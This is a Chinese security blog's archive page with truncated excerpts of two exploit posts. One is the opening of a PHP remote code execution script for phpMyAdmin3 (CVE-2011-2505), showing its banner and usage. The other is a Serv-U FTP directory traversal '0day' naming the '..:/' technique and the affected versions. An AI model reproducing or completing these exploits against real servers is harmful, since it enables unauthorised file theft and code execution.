存档

‘应用安全’ 分类的存档

phpMyAdmin3 remote code execute exploit [Not jilei(chicken\’s ribs)]

2011年12月26日 3 条评论
  1. #!/usr/bin/php
  2. <?php
  3. print_r(‘
  4. +—————————————————————————+
  5. pma3 – phpMyAdmin3 remote code execute exploit [Not jilei(chicken\’s ribs)]
  6. by oldjun(www.oldjun.com)
  7. welcome to www.t00ls.net
  8. mail: oldjun@gmail.com
  9. Assigned CVE id: CVE-2011-2505
  10. +—————————————————————————+
  11. ‘);
  12. /**
  13. * working when the directory:”config” exists and is writeable.
  14. **/
  15. if ($argc < 3) {
  16. print_r(‘
  17. +—————————————————————————+
  18. Usage: php ‘.$argv[0].’ host path
  19. host: target server (ip/hostname)
  20. path: path to pma3
  21. Example:
  22. php ‘.$argv[0].’ localhost /pma/
  23. +—————————————————————————+ 阅读全文…
分类: 应用安全 标签:

Serv-U FTP Server Jail Break 0day

2011年12月1日 4 条评论
[*]----------------------------------------------------[*]
    Serv-U FTP Server Jail Break 0day
    Discovered By Kingcope
    Year 2011
[*]----------------------------------------------------[*]

/*
通过构造..:/来遍历服务器目录,下载任意文件
影响版本:6.4,7.1,7.3,8.2,10.5
*/

Affected:
220 Serv-U FTP Server v7.3 ready...
220 Serv-U FTP Server v7.1 ready...
220 Serv-U FTP Server v6.4 ready...
220 Serv-U FTP Server v8.2 ready...
220 Serv-U FTP Server v10.5 ready...

[*]----------------------------------------------------[*]

阅读全文…

分类: 应用安全 标签:
普人特福的博客cnzz&51la for wordpress,cnzz for wordpress,51la for wordpress